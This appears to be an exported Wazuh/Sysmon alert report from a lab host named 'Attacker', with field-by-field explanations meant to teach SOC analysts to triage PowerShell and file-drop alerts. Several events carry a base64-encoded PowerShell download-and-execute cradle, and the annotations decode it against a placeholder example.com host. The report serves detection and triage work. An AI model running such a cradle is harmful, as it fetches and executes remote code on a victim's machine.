data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:53.8502052Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284944
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:53.827 ProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} ProcessId: 14828 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_owe3gjix.5wo.ps1 CreationUtcTime: 2025-04-24 22:38:53.827 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:53.827
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd7c-680a-8d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14828
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_owe3gjix.5wo.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:53.827
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:59.913+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:59.913+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  80
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534339.1744054
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:57.2803391Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284980
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:55.073 ProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} ProcessId: 2520 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} ParentProcessId: 14828 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:55.073
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd7f-680a-8f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd7c-680a-8d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14828
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line, identical to this process's own: the same encoded cradle is being re-launched. The base64 is UTF-16LE and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test').

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent runs as. Same as user, so no token change happened between parent and child.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:59.915+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:59.915+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  84
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534339.1752121
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Sysmon here, so data.win.system.eventID follows Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider ({5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's). Use it for exact provider filters in XPath queries or WEF subscriptions.

data.win.system.eventID:  11
Event ID within the provider's own numbering. For Sysmon, 11 = FileCreate (and 1 = ProcessCreate); don't read it as a Security-log ID like 4688.

data.win.system.version:  2
Schema version of this event type. Sysmon bumps it when it adds fields, so parsers keyed on field position can break after an upgrade.

data.win.system.level:  4
Windows event level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon logs every event at 4, so severity comes from the Wazuh rule, not from this field.

data.win.system.task:  11
Task category. For Sysmon it mirrors the event ID (11 = FileCreate); the Logon / Policy Change categories belong to the Security log.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:57.6272922Z
When the event was written to the channel (UTC). Compare with data.win.eventdata.utcTime (when the action happened) and the Wazuh timestamp (when it was indexed) to measure ingest lag; here about two seconds end to end.

data.win.system.eventRecordID:  284981
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event: the Sysmon service itself (3712 in every event here), not the process being reported. Don't confuse it with data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the event. Forensic noise; safe to ignore.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the agent reads. Microsoft-Windows-Sysmon/Operational has to be listed explicitly in the agent's <localfile> configuration or Sysmon events never reach Wazuh.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch points to a renamed host or a forwarded event.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:57.575 ProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} ProcessId: 2520 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mjeitfip.wlw.ps1 CreationUtcTime: 2025-04-24 22:38:57.569 User: Attacker\Attcker1"
Full rendered event text (Sysmon FileCreate). Every data.win.eventdata field below is parsed from it, so read it whenever a parsed value looks truncated or mis-escaped.

data.win.eventdata.utcTime:  2025-04-24 22:38:57.575
When Sysmon observed the file create (UTC, millisecond precision). This is the forensic timestamp; data.win.system.systemTime is only when it was logged.

data.win.eventdata.processGuid:  {94294ddc-bd7f-680a-8f0b-000000000e00}
Sysmon's unique ID for the creating process, stable across PID reuse. Pivot on it to pull every Sysmon event from this process; the next PowerShell EID 1 alert names this same value as its parentProcessGuid, so the process that wrote this file is the one that spawned the next PowerShell.

data.win.eventdata.processId:  2520
PID at the time of the event. PIDs are recycled once a process exits, so pivot on processGuid rather than on this.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Process that created the file: a genuine System32 powershell.exe, which is exactly what writes the file named below.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mjeitfip.wlw.ps1
Path of the created file. __PSScriptPolicyTest_<8 chars>.<3 chars>.ps1 in %TEMP% is written (and then deleted) by powershell.exe itself at start-up to test whether AppLocker/WDAC script enforcement applies; it is a launch artefact, not a payload drop. The rule fires on any .ps1 landing in Temp, so the 'Executable file dropped' headline overstates this event; the real signal is the PowerShell launch that produced it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:57.569
Creation timestamp carried by the file itself. A value well before utcTime means an existing file was overwritten or its timestamp was reset; here it is 6 ms earlier, i.e. a fresh file.

data.win.eventdata.user:  Attacker\\Attcker1
Account the creating process runs as (DOMAIN\user). The same local account appears on every PowerShell event in this report.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:02.414+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:02.414+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  81
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534342.1754886
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Sysmon here, so data.win.system.eventID follows Sysmon's numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider ({5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's). Use it for exact provider filters in XPath queries or WEF subscriptions.

data.win.system.eventID:  1
Event ID within the provider's own numbering. For Sysmon, 1 = ProcessCreate; the Security-log equivalent is 4688, which lacks the hashes and GUIDs you get here.

data.win.system.version:  5
Schema version of this event type. Sysmon bumps it when it adds fields, so parsers keyed on field position can break after an upgrade.

data.win.system.level:  4
Windows event level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon logs every event at 4, so severity comes from the Wazuh rule, not from this field.

data.win.system.task:  1
Task category. For Sysmon it mirrors the event ID (1 = ProcessCreate).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:59.8050356Z
When the event was written to the channel (UTC). Compare with data.win.eventdata.utcTime (when the process started) and the Wazuh timestamp (when it was indexed) to measure ingest lag; here roughly four seconds end to end.

data.win.system.eventRecordID:  285021
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event: the Sysmon service itself, not the process being reported. Don't confuse it with data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread of the Sysmon service that wrote the event. Forensic noise; safe to ignore.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the agent reads. Must be listed explicitly in the agent's <localfile> configuration or Sysmon events never reach Wazuh.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch points to a renamed host or a forwarded event.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:58.630 ProcessGuid: {94294ddc-bd82-680a-910b-000000000e00} ProcessId: 13540 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} ParentProcessId: 2520 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full rendered event text (Sysmon ProcessCreate). The data.win.eventdata fields below are parsed from it; note that parent and child carry the identical command line.

data.win.eventdata.utcTime:  2025-04-24 22:38:58.630
Process start time as seen by Sysmon (UTC). The forensic timestamp for this launch; data.win.system.systemTime is only when it was logged.

data.win.eventdata.processGuid:  {94294ddc-bd82-680a-910b-000000000e00}
Sysmon's unique ID for the new process, stable across PID reuse. Pivot on it for everything this process did; the following 'file dropped' alert and the parentProcessGuid of the next PowerShell alert both carry this value.

data.win.eventdata.processId:  13540
PID at start. Recycled after exit, so pivot on processGuid.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Binary that started: a genuine System32 powershell.exe. The threat is in the arguments, not in the file.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the image's PE resource; 10.0.26100 is a Windows 11 24H2 build. Compare with the host's OS build to spot an out-of-place copy.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource, set by the vendor at build time. It says Windows PowerShell (5.1), not PowerShell 7.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource. An unexpected or empty vendor on a System32 path is a red flag.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal name from the PE version resource. Renaming the binary on disk does not change it, which is why robust rules match on OriginalFileName rather than on Image.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact command line of the new process. powershell.exe appears twice: the outer instance is re-launching itself with -NoLogo -NoProfile -EncodedCommand. The base64 is UTF-16LE and decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download cradle, here pointed at the reserved example.com placeholder; the fetched content is unknown, so the pattern, not the URL, is what matters.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process. The user's profile root, consistent with an interactive launch.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as (DOMAIN\user). A local account on the Attacker host.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session that spawned the process. Correlate it with Security event 4624 on the host to learn how Attcker1 logged on.

data.win.eventdata.logonId:  0x26584
Logon session ID (the Security log's LogonId). Identical in every PowerShell event of this report, so this is one session, not repeated logons.

data.win.eventdata.terminalSessionId:  1
Windows session number: 0 = services and non-interactive, 1 and up = interactive user sessions. Run from a logged-on desktop, not from a service.

data.win.eventdata.integrityLevel:  Medium
Process integrity level. Medium = standard user token, not elevated; High would mean an admin PowerShell. It bounds what the payload can do without a further privilege escalation.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image on disk, in the algorithms Sysmon is configured for (SHA256 here). Identical for every powershell.exe event in this report, so the binary is unchanged; compare it with the hash of the genuine build or your EDR's file catalog.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd7f-680a-8f0b-000000000e00}
Sysmon GUID of the parent. It equals the processGuid of the 'file dropped' alert above: the PowerShell that wrote the policy-test file is the one that spawned this instance.

data.win.eventdata.parentProcessId:  2520
PID of the parent at spawn time; pivot on parentProcessGuid instead.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Binary of the parent. PowerShell spawning PowerShell with an encoded command is what rule 92057 keys on; legitimate scripts rarely need to re-launch the interpreter that way.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's full command line, identical to this process's own: the same encoded cradle is being re-launched, one PowerShell spawning the next. Walk parentProcessGuid back until the parent is no longer powershell.exe to find the original launcher.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent runs as. Same as user, so no token change between parent and child.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

